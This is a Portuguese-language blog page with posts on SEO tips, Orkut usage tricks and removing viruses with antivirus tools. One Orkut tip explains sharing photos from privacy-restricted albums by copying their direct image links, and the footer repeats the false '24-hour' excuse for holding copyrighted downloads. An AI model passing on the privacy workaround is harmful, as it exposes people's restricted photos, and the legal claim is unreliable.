1 - Títulos das páginas: O título, texto encontrado dentro da tag “title” e que nos navegadores aparece no topo da janela, é um dos ítens mais importantes para a relevância. É a primeira coisa que um usuário lê no resultado de uma busca e precisa conter informações relevantes ao conteúdo. Veja como funcionam as páginas das lojas virtuais otimizadas (Americanas.com, Submarino ou Mercado Livre), todas utilizam nos títulos descrições dos produtos que acabam servindo como keywords para os motores de busca. Repetir o título é disperdício de informação e para os buscadores pode ser considerado como conteúdo duplicado, por isso sempre deixe diferente para cada página.
2 - A introdução às palavras-chave: Os primeiros 2 parágrafos de um post são extremamente importantes e devem ser ricos em palavras-chave. Pode fazê-lo manualmente através da concepção de conteúdo de qualidade. Pode aproveitar também para definir quais os conteúdos mais relevantes dos seus posts aos olhos do Google Adsense. Isso fará com que o seu CTR aumente e os seus lucros melhorem.
3 - Otimizar as Imagens também é importante: Como citei anteriormente, quando se adiciona uma imagem a um dado texto, é importante editar a imagem com informação relativa ao texto ALT, título da imagem, e o nome do ficheiro. Por vezes existe preguiça em escrever o nome das imagens conforme o sentido que elas utilizam. É mais fácil escrever uma imagem com o título xpto.png ao invés de escrever google-adsense-optimization.png por exemplo. No entanto, os resultados desta última são bastante mais satisfatórios a vários níveis. Não se esqueça que o mercado de optimização de imagens é ainda muito pouco explorado, e você pode retirar dividendos disso com uma boa colocação das suas imagens nos motores de busca. Optimizar imagens também é SEO!
4 - Conteúdo Original: Um conteúdo original ganha pontos, tanto com os buscadores quanto com a comunidade. Os robôs são inteligentes e detectam sites e páginas parecidas, punindo cópias e rebaixando nos resultados. Além disso, se você é original e inédito será referenciado por outros sites e blogs e ganhará muito com isso.
5 – Utilize backlinks: Outra forma de ganhar notoriedade na rede é utilizar backlinks para acompanhar onde suas postagens estão, para onde ela vai. Segundo o google “Os backlinks permitem que você acompanhe quais páginas na Web levam às suas postagens. Por exemplo, suponha que Alice escreva um post que Beto ache interessante. Beto vai para seu próprio blog e escreve uma postagem a respeito, com um link para a postagem original de Alice. Agora a postagem de Alice exibirá, automaticamente, que Beto tem um link para ela e fornecerá um snippet de seu texto e um link para sua postagem. Isso tudo funciona como uma maneira de expandir o recurso de comentário de modo que as discussões relacionadas em outros sites possam ser incluídas juntamente com os comentários comuns em uma postagem.”
6 – Sitemaps: Os buscadores oferecem ferramentas para submissão de sitemaps em XML que aceleram a indexação das páginas. O Google possui o serviço Google Sitemaps e o Yahoo, o Site Explorer. Ambos são gratuitos e aceitam os mesmos formatos de sitemaps. A vantagem de utilizá-los é que o robô encontrará suas páginas mesmo que elas não possuam links publicados pela Internet.
7 - Metatags: A utilização das metatags dentro da tag “header” das páginas também são imprescindíveis. As duas principais são a Keywords e a Description. O ideal é que sempre sejam diferentes dentro de um site e contenham informações referentes ao conteúdo que está sendo apresentado. A primeira, possui palavras-chave relacionadas ao conteúdo da página e não deve ultrapassar 30 caracteres. A segunda, possui uma informação descrevendo o site ou a página e não deve ultrapassar os 40 caracteres.
8 - URLs: Observe neste blog que você não encontra URLs com os parâmetros “?cat=2? ou “?page_id=2? para acessar as páginas. As URLs aqui estão “limpas”, muitas com keywords, o que facilita a indexação e relevância nos buscadores. Neste blog foi utilizado o plugin UTW, que facilita muito a utilização e configuração dessas URLs.
9 - Não utilizar o Keyword Stuffing: Esta é uma das técnicas ilegais a utilizar num blog ou website. Significa a utilização exacerbada de uma ou várias palavras-chave num único artigo. Utilize apenas palavras-chave no título do seu artigo, nas descrições dos seus artigos e nos pequenos sub-títulos que vá criando ao longo do seu artigo. Uma prática de Keyword Stuffing, pode dar origem ao banimento do seu blog ou website dos motores de busca!
10 - Integrar o seu website ou blog em motores de busca e directórios: A inserção do seu blog ou website em diretórios e motores de busca é importante a vários níveis. Esta é uma das técnicas já muito usadas do SEO, mas que trazem bastante rendimento a longo prazo.
11 - Faça Ping em diversos serviços online: Sempre que coloca um conteúdo no seu website ou blog, é importante ser rápido a notificar os diversos serviços on-line de indexação de notícias e conteúdos. Quanto mais rápido for, mais rapidamente irá garantir que a sua página é indexada e atualizada.
12-A importância da Monitorização: Uma das mais importantes ferramentas de SEO é a monitorização. Através dela você consegue saber até que ponto as suas páginas estão bem posicionadas ou não nos motores de busca, saberá de onde provem o seu tráfego, e a qualidade desse mesmo tráfego. Sem monitorização é praticamente impossível obter ou melhorar os resultados.

Aconselho também a utilização do Webmaster Tools da Google, para a indexação dos mapas de site e melhoramento da indexação das suas páginas no Google.
Acesse e cadastre seu site/blog:
http://www.blogger.com/www.google.com/webmasters/tools
Estude e implemente essas técnicas em seu blog, garanto que seu irá melhorar bem seu desempenho, claro que isso não vai acontecer de um dia para o outro, poderá demorar um pouco, mas com um pouco de trabalho e dedicação, vocês terão sucesso
Ahh, é importante estudar cada detalhe das suas páginas através das estatísticas, observar quais estão tendo melhores visitas, modificar se for preciso, às vezes uma pequena mudança, pode aumentar consideravelmente seus ganhos e visitas.
Estarei sempre buscando novas técnicas, irei publicar todas aqui no blog.
Abraços
Ler mais

Informática do Dia-a-Dia: Dicas para o Orkut

Confira algumas formas de melhorar sua navegação pelo site.

Como os usuários estão sempre procurando novidades e formas mais interessantes de se comunicar pela rede social do Google, o Orkut, preparamos algumas dicas e truques para melhorar sua navegação e tirar todo proveito dos recursos dessa rede de relacionamentos dominada pelos brasileiros.

Fotos de álbuns bloqueados

A política de privacidade do Orkut permite que os usuários restrinjam suas fotos para pessoas que não estão na sua lista de amigos. No entanto, existe uma forma de burlar essa restrição e enviar um link com as fotos para quem você quiser, mesmo que a pessoa não esteja na lista de amigos. É claro que não será possível ver os comentários e a descrição da foto, mas é a forma mais fácil de mostrar uma foto bloqueada.

Se você usa o navegador Firefox, clique com o botão direito do mouse na imagem e selecione “Copiar endereço da imagem”, agora, é só colar o link onde desejar. No Internet Explorer o caminho é mais complicado: clique com o botão direito do mouse na foto e selecione a opção “Propriedades”. Em seguida, aparecerá uma janela com detalhes da imagem, copie o endereço (URL) da foto e envie para qualquer pessoa.

Em alguns navegadores é possível arrastar a foto para uma nova aba, ou então, arrastar para a própria barra de endereços. Assim, a foto será exibida isoladamente. Agora é só copiar o link da barra de endereços e colar no fórum, Messenger, página de recados, etc.

Amigos para sempre

O Orkut é uma forma de se conectar a amigos e conhecidos, muitos deles você guarda no coração e gostaria de manter contato sempre. A página de gerenciamento de amigos do Orkut possui uma opção de backup capaz de exportar os dados de seus contatos no formato CSV para seu computador. Este arquivo pode ser visualizado no Excel ou aberto por qualquer cliente de email, como o Outlook.

oirártnoc oa odnevercsE

Não entendeu o título? Leia de traz para frente. O código &#8238, colocado no início do texto, faz com que cada linha da página de recados ou fórum fique escrita de traz para frente. Isso é usado em textos onde a escrita é feita ao contrário, como nos idiomas orientais.

O ressuscitador

As comunidades do Orkut tratam de diversos assuntos, como jogos, música, culinária, séries e muito mais. Nelas é possível postar dúvidas, comentários, notícias e jogar papo fora. As que mais se destacam são aquelas que possuem milhares de usuários e, por isso, é bem provável que o seu tópico fique esquecido em algum lugar da segunda ou terceira página.
Para dar uma "ressuscitada" no tópico e reativar a discussão sem dizer nada, coloque os códigos [i][/i] no corpo da mensagem e envie. Assim, o tópico ficará no topo da lista e pode ser que alguém responda sua dúvida mais facilmente.

Navegação rápida

Utilizando a combinação de teclas ALT+SHIFT, o usuário consegue alternar entre as páginas do Orkut facilmente sem precisar usar o mouse. Pressione a combinação de teclas ALT+SHIFT+C para acessar a página de comunidades. Com ALT+SHIFT+S é possível acessar a página de recados (Scraps) e ALT+SHIFT+H volta para a página de inicio (Home). Depois de tudo conferido, pressione ALT+SHIFT+L para efetuar logoff.

Recados no celular

Algumas pessoas são tão vidradas no Orkut que não podem ficar dois minutos sem ver a página de recados. Agora elas não precisam mais ficar na frente do computador para ver ou mandar recados. O Orkut possui um sistema que envia e recebe recados pelo celular através de SMS.
O serviço não é gratuito, mas é mais barato do que um SMS normal, isso varia de acordo com a operadora. Atualmente, o serviço está disponível para as operadoras Claro, Amazônia Celular, Brasil Telecom, Oi, Telemig Celular, TIM e Vivo. Algumas possuem tarifas diferenciadas, confira as taxas nesse link.
Para configurar o serviço, vá para a página de configurações do Orkut e clique na aba “Celular”. Agora, selecione a operadora do seu celular e insira seu numero com o DDD. Veja mais detalhes nesse artigo e comece a receber e enviar recados pelo celular.




Fonte;www.baixaki.com.br
Por Douglas Leandro Pereira
Ler mais

10/05/2009

Retirando Trojans, vírus etc do seu micro

As vezes você não entende porque pegou aquele vírus, já que o seu antivírus estava funcionando perfeitamente. Talvez você não saiba é que precisamos ter tempo para atualiza-lo e mandar fazer uma varredora completa no micro pelo menos 1 vezes por mês.
Nenhum computador está a salvo. Engana-se quem ainda acredita que os e-mails recebidos e enviados estão protegidos, que todos os dados secretos estão ocultos aos olhares indiscretos e que as senhas são sinônimos de proteção. Alvo dos hackers, nem mesmo os programas mais desenvolvidos e mais seguros estão livre desses invasores.
Hoje em dia 57 milhões de pessoas já podem ter sido alvo de outro tipo de ataque, o Phishing Scam. Segundo as estatísticas do Gartner Group 1,7 milhões realmente caíram na armadilha!
Outra estatística aponta que dos 1.974 novos tipos de scam 682 usam nomes de banco. Não tenho duvida que enfrentamos uma onda de tentativas a roubo a bancos on-line, buscando sempre o lado mais fraco, o usuário. Haja programas pra isso.
Mas se o vírus não sai, vamos tentar aqui encontrar algumas ferramentas que tire.
Analise on-line o seu micro pelo site do Kaspersky
Analise e retire vírus on-line (Panda Security)
Ferramenta de Remoção de Software Mal-intencionado Microsoft
Ewido Anti-Malware (matéria e download)
Avira, antivírus fantástico
Atualize agora o seu windows
Firewall: use o ZoneAlarm
Vários antivírus para download pelo nosso site
Agora você precisa protege os seus e-mails. Você tem certeza que seus e-mails chegam com segurança, mesmo que uma pessoa maliciosa tenha acesso a eles? E que essa segurança você pode estender para o seu Pend Driver, sendo quase impossível de ser lido, senão por você?
Use o programa CRYPTAINER, como o nome já diz, ele cria uma criptografia para os seus dados. Recomendamos para empresas e profissionais que precisam dessa segurança. O cryptainer cria dados criptografados de 128 bits. Ele permite, na sua versão FREE, criar vários cofres virtuais com volumes de 25MB!
Baixe o Cryptainer
Os programas vão ser muito úteis para você, mas não se esqueça de atualizar sempre o seu windows. As pessoas se esquecem disso, alguns acham que não é importante ou simplesmente não tem paciência de esperar. Procure configurar o seu windows para fazer isso automaticamente. Ë fácil, entre em Painel de Controle e clique no ícone Atualizações Automáticas. Lá procure configurar o seu micro para fazer tudo automático e no horário que você esta na internet. Praticamente todas as falhas que os vírus aproveitam vão ser fechadas se você fizer isso
Ler mais
ATENÇÃO! Todos os links e arquivos que se encontram no site, estão hospedados na própria Internet, somente indicamos onde se encontra. Qualquer arquivo protegido por algum tipo de lei deve permanecer, no máximo, 24 horas em seu computador. Eles podem ser baixados apenas para teste, devendo o usuário apagá-lo ou comprá-lo após 24 horas. A Aquisição desses arquivos pela Internet é de única e exclusiva responsabilidade do usuário.
"Você tem o direito de permanencer calado.
Tudo o que você fizer usando o conhecimento deste blog 
poderá ser usado contra você no tribunal."